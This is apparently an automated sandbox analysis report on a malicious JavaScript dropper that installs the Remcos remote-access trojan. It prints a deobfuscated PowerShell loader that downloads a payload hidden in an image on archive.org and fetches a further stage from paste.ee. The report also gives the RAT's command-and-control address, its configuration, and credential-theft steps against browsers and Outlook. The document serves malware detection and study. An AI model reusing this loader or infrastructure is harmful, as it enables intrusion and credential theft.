Analysis

  • max time kernel
    148s
  • max time network
    145s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
  • submitted
    16-09-2024 07:14

General

  • Target

    C_UsersAdministratorDesktopWernbvFILE_DOC_SSLMUNSRG0014624.js

  • Size

    600KB

  • MD5

    2b1f137f22ac559ec305ce5cfa8890b4

  • SHA1

    78eea4d0412efdce79ecd7bd36381d9fcec3b07c

  • SHA256

    87a46f9efd26fa0b9182f12ee89ef19975fab1927d056629142608f27cc5f4b1

  • SHA512

    d772cf3cda1ac8368992d21217cd6c866a5554bc3f4e9ee728709c03d72e402f8bfcd5a21afc6e58dbcdba4090b0f9970b7adab857b1b6d85d123c24a616383c

  • SSDEEP

    12288:W8hhuwMaJTTfrjTsfY51YkMLrl5sDdNZftj0Ue6BzNv2kSw0OORbrHy3JTpgxRmX:BhJKIzFt4nR6jX5n

Malware Config

Extracted

Language
ps1
Deobfuscated
$imageurl = "https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg"
$webclient = new-object system.net.webclient
$imagebytes = $webclient.downloaddata("https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg")
$imagetext = ([system.text.encoding]::ascii).getstring($imagebytes)
$startflag = "<<BASE64_START>>"
$endflag = "<<BASE64_END>>"
$startindex = $imagetext.indexof("<<BASE64_START>>")
$endindex = $imagetext.indexof("<<BASE64_END>>")
$startindex -ge 0 -and $endindex -gt $startindex
$startindex = $startflag.length
$base64length = $endindex - $startindex
$base64command = $imagetext.substring($startindex, $base64length)
$commandbytes = [system.convert]::frombase64string($base64command)
$loadedassembly = [system.reflection.assembly]::load($commandbytes)
$type = $loadedassembly.gettype("dnlib.IO.Home")
$method = ($type.getmethod("VAI")).invoke($null, [object[]]"0/2XXnC/d/ee.etsap//:sptth", "1", "C:\\ProgramData\\", "enhadir", "AddInProcess32", "desativado")

URLs
ps1.dropper

https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg

exe.dropper

https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg

Extracted

Family

remcos

Botnet

pc file

C2

185.150.191.117:4609

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-PICFH2

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is closed-source remote control and surveillance software.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious access to, or copying of, a web browser credential store.

  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers to steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Runs PowerShell with the display window hidden.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\C_UsersAdministratorDesktopWernbvFILE_DOC_SSLMUNSRG0014624.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3936
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3748
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('0/2XXnC/d/ee.etsap//:sptth' , '1' , 'C:\ProgramData\' , 'enhadir','AddInProcess32','desativado'))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3268
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\enhadir.js"
          4⤵
            PID:4640
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            4⤵
              PID:652
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
              4⤵
                PID:340
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                4⤵
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of WriteProcessMemory
                PID:916
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\belexfejhxmwhbovhfkpftbg"
                  5⤵
                    PID:4408
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\belexfejhxmwhbovhfkpftbg"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2164
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\dgzxyypcdfejkhkhqqxqqgvpczf"
                    5⤵
                    • Accesses Microsoft Outlook accounts
                    • System Location Discovery: System Language Discovery
                    PID:2692
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\oaepzqaernwounylhbsstlqgkgomdk"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3908

          Network

          • flag-us
            DNS
            ia601606.us.archive.org
            powershell.exe
            Remote address:
            8.8.8.8:53
            Request
            ia601606.us.archive.org
            IN A
            Response
            ia601606.us.archive.org
            IN A
            207.241.227.86
          • flag-us
            GET
            https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg
            powershell.exe
            Remote address:
            207.241.227.86:443
            Request
            GET /10/items/deathnote_202407/deathnote.jpg HTTP/1.1
            Host: ia601606.us.archive.org
            Connection: Keep-Alive
            Response
            HTTP/1.1 200 OK
            Server: nginx/1.25.1
            Date: Mon, 16 Sep 2024 07:15:14 GMT
            Content-Type: image/jpeg
            Content-Length: 1931225
            Last-Modified: Fri, 26 Jul 2024 22:09:28 GMT
            Connection: keep-alive
            ETag: "66a41e98-1d77d9"
            Strict-Transport-Security: max-age=15724800
            Expires: Mon, 16 Sep 2024 13:15:14 GMT
            Cache-Control: max-age=21600
            Access-Control-Allow-Origin: *
            Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
            Access-Control-Allow-Credentials: true
            Accept-Ranges: bytes
          • flag-us
            DNS
            86.227.241.207.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            86.227.241.207.in-addr.arpa
            IN PTR
            Response
            86.227.241.207.in-addr.arpa
            IN PTR
            ia601606usarchiveorg
          • flag-us
            DNS
            paste.ee
            powershell.exe
            Remote address:
            8.8.8.8:53
            Request
            paste.ee
            IN A
            Response
            paste.ee
            IN A
            104.21.84.67
            paste.ee
            IN A
            172.67.187.200
          • flag-us
            GET
            https://paste.ee/d/CnXX2/0
            powershell.exe
            Remote address:
            104.21.84.67:443
            Request
            GET /d/CnXX2/0 HTTP/1.1
            Host: paste.ee
            Connection: Keep-Alive
            Response
            HTTP/1.1 200 OK
            Date: Mon, 16 Sep 2024 07:15:17 GMT
            Content-Type: text/plain; charset=utf-8
            Transfer-Encoding: chunked
            Connection: keep-alive
            Cache-Control: max-age=2592000
            strict-transport-security: max-age=63072000
            x-frame-options: DENY
            x-content-type-options: nosniff
            x-xss-protection: 1; mode=block
            content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iOsU5iRZYjZ51B86VGVAk%2FqTPG3jXi1KSHGmH0bUVuWRb75%2BT1UmV9dN%2FWnmuQVBJvVJUs7MPqUNFmZnNJ7MCDLnHQpGhpw2s8kvzkzIDTSEuuJh%2FgR6z1XaxQ%3D%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 8c3f107e1ab97767-LHR
            alt-svc: h3=":443"; ma=86400
          • flag-us
            DNS
            67.84.21.104.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            67.84.21.104.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            117.191.150.185.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            117.191.150.185.in-addr.arpa
            IN PTR
            Response
            117.191.150.185.in-addr.arpa
            IN PTR
            serverrsmithukcom
          • flag-us
            DNS
            geoplugin.net
            AddInProcess32.exe
            Remote address:
            8.8.8.8:53
            Request
            geoplugin.net
            IN A
            Response
            geoplugin.net
            IN A
            178.237.33.50
          • flag-nl
            GET
            http://geoplugin.net/json.gp
            AddInProcess32.exe
            Remote address:
            178.237.33.50:80
            Request
            GET /json.gp HTTP/1.1
            Host: geoplugin.net
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            date: Mon, 16 Sep 2024 07:15:19 GMT
            server: Apache
            content-length: 954
            content-type: application/json; charset=utf-8
            cache-control: public, max-age=300
            access-control-allow-origin: *
          • flag-us
            DNS
            50.33.237.178.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            50.33.237.178.in-addr.arpa
            IN PTR
            Response
            50.33.237.178.in-addr.arpa
            IN CNAME
            50.32/27.178.237.178.in-addr.arpa
          • flag-us
            DNS
            22.236.111.52.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            22.236.111.52.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            209.80.50.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            209.80.50.20.in-addr.arpa
            IN PTR
            Response
          • 207.241.227.86:443
            https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg
            tls, http
            powershell.exe
            59.0kB
            2.0MB
            1087
            1442

            HTTP Request

            GET https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg

            HTTP Response

            200
          • 104.21.84.67:443
            https://paste.ee/d/CnXX2/0
            tls, http
            powershell.exe
            12.9kB
            688.8kB
            272
            536

            HTTP Request

            GET https://paste.ee/d/CnXX2/0

            HTTP Response

            200
          • 185.150.191.117:4609
            tls
            AddInProcess32.exe
            3.4kB
            1.7kB
            14
            17
          • 185.150.191.117:4609
            tls
            AddInProcess32.exe
            34.6kB
            512.4kB
            211
            384
          • 178.237.33.50:80
            http://geoplugin.net/json.gp
            http
            AddInProcess32.exe
            623 B
            1.3kB
            12
            3

            HTTP Request

            GET http://geoplugin.net/json.gp

            HTTP Response

            200
          • 8.8.8.8:53
            ia601606.us.archive.org
            dns
            powershell.exe
            69 B
            85 B
            1
            1

            DNS Request

            ia601606.us.archive.org

            DNS Response

            207.241.227.86

          • 8.8.8.8:53
            86.227.241.207.in-addr.arpa
            dns
            73 B
            110 B
            1
            1

            DNS Request

            86.227.241.207.in-addr.arpa

          • 8.8.8.8:53
            paste.ee
            dns
            powershell.exe
            54 B
            86 B
            1
            1

            DNS Request

            paste.ee

            DNS Response

            104.21.84.67
            172.67.187.200

          • 8.8.8.8:53
            67.84.21.104.in-addr.arpa
            dns
            71 B
            133 B
            1
            1

            DNS Request

            67.84.21.104.in-addr.arpa

          • 8.8.8.8:53
            117.191.150.185.in-addr.arpa
            dns
            74 B
            107 B
            1
            1

            DNS Request

            117.191.150.185.in-addr.arpa

          • 8.8.8.8:53
            geoplugin.net
            dns
            AddInProcess32.exe
            59 B
            75 B
            1
            1

            DNS Request

            geoplugin.net

            DNS Response

            178.237.33.50

          • 8.8.8.8:53
            50.33.237.178.in-addr.arpa
            dns
            72 B
            155 B
            1
            1

            DNS Request

            50.33.237.178.in-addr.arpa

          • 8.8.8.8:53
            22.236.111.52.in-addr.arpa
            dns
            72 B
            158 B
            1
            1

            DNS Request

            22.236.111.52.in-addr.arpa

          • 8.8.8.8:53
            209.80.50.20.in-addr.arpa
            dns
            71 B
            157 B
            1
            1

            DNS Request

            209.80.50.20.in-addr.arpa

          MITRE ATT&CK Enterprise v15

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            3KB

            MD5

            bdd6fe03cb914493642dbebd2a8eca3a

            SHA1

            5aedb1b99946f5cfca9a73733cb99f4c8fdd4d39

            SHA256

            c371097b809eb02248e6d38da3660037ce5690e428b4d6429bd8926c7c53a0d5

            SHA512

            2c3f0a05b4eed53f481d63528199396fe51f95a0a53183299de6e1d2544910b2a84b75d41f07b3ce082291cb710ba8b1ad422291e889cab4b32f8b3b73716781

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            560B

            MD5

            2adabd007b42e8ba4bcaeb41580de097

            SHA1

            e68c9d688921179dda32efad975c9d1478567526

            SHA256

            3696cd7703f6dc0bf4e89a22fb8b7f69f2bf758adbcfbc6b10dac6a8f3e08902

            SHA512

            11cb47f9bf19ac26dc321e00540b13a9989265f96e0408ed749cb7baf00ceb265ac72360526db3a285eb69a9f4e3b90890d93f14dfbcbf91f802a91986baa31d

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ilajjxte.h4u.ps1

            Filesize

            1B

            MD5

            c4ca4238a0b923820dcc509a6f75849b

            SHA1

            356a192b7913b04c54574d18c28d46e6395428ab

            SHA256

            6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

            SHA512

            4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

          • C:\Users\Admin\AppData\Local\Temp\belexfejhxmwhbovhfkpftbg

            Filesize

            4KB

            MD5

            00ab65283d294d9d0cc69dfd2b486caf

            SHA1

            804478c60330b8c19cc3a7cb2ceb906c0f32347c

            SHA256

            4bcd9431ddec18b317d0846b2aba64b064b54ea2639e64388ea00f6e559dbb34

            SHA512

            996ac8923c5b911b7716e4873590fd32a47bf0ccc53cd1476f6f276ba3b9777e490218bca05c16135c8ed70b9c0b86782273ab6748d80b7d67c0160abb3e922f

          • memory/916-71-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/916-68-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/916-86-0x0000000010000000-0x0000000010019000-memory.dmp

            Filesize

            100KB

          • memory/916-54-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/916-58-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/916-59-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/916-60-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/916-101-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/916-100-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/916-96-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/916-66-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/916-67-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/916-69-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/916-89-0x0000000010000000-0x0000000010019000-memory.dmp

            Filesize

            100KB

          • memory/916-94-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/916-90-0x0000000010000000-0x0000000010019000-memory.dmp

            Filesize

            100KB

          • memory/916-91-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/916-93-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/916-92-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/2164-77-0x0000000000400000-0x0000000000478000-memory.dmp

            Filesize

            480KB

          • memory/2164-74-0x0000000000400000-0x0000000000478000-memory.dmp

            Filesize

            480KB

          • memory/2164-72-0x0000000000400000-0x0000000000478000-memory.dmp

            Filesize

            480KB

          • memory/2692-76-0x0000000000400000-0x0000000000462000-memory.dmp

            Filesize

            392KB

          • memory/2692-75-0x0000000000400000-0x0000000000462000-memory.dmp

            Filesize

            392KB

          • memory/2692-73-0x0000000000400000-0x0000000000462000-memory.dmp

            Filesize

            392KB

          • memory/3268-44-0x0000025440540000-0x0000025440662000-memory.dmp

            Filesize

            1.1MB

          • memory/3748-65-0x00007FFFEE740000-0x00007FFFEF12C000-memory.dmp

            Filesize

            9.9MB

          • memory/3748-5-0x00000223801E0000-0x0000022380202000-memory.dmp

            Filesize

            136KB

          • memory/3748-0-0x00007FFFEE743000-0x00007FFFEE744000-memory.dmp

            Filesize

            4KB

          • memory/3748-9-0x00000223805F0000-0x0000022380666000-memory.dmp

            Filesize

            472KB

          • memory/3748-8-0x00007FFFEE740000-0x00007FFFEF12C000-memory.dmp

            Filesize

            9.9MB

          • memory/3748-10-0x00007FFFEE740000-0x00007FFFEF12C000-memory.dmp

            Filesize

            9.9MB

          • memory/3908-78-0x0000000000400000-0x0000000000424000-memory.dmp

            Filesize

            144KB

          • memory/3908-79-0x0000000000400000-0x0000000000424000-memory.dmp

            Filesize

            144KB

          • memory/3908-80-0x0000000000400000-0x0000000000424000-memory.dmp

            Filesize

            144KB
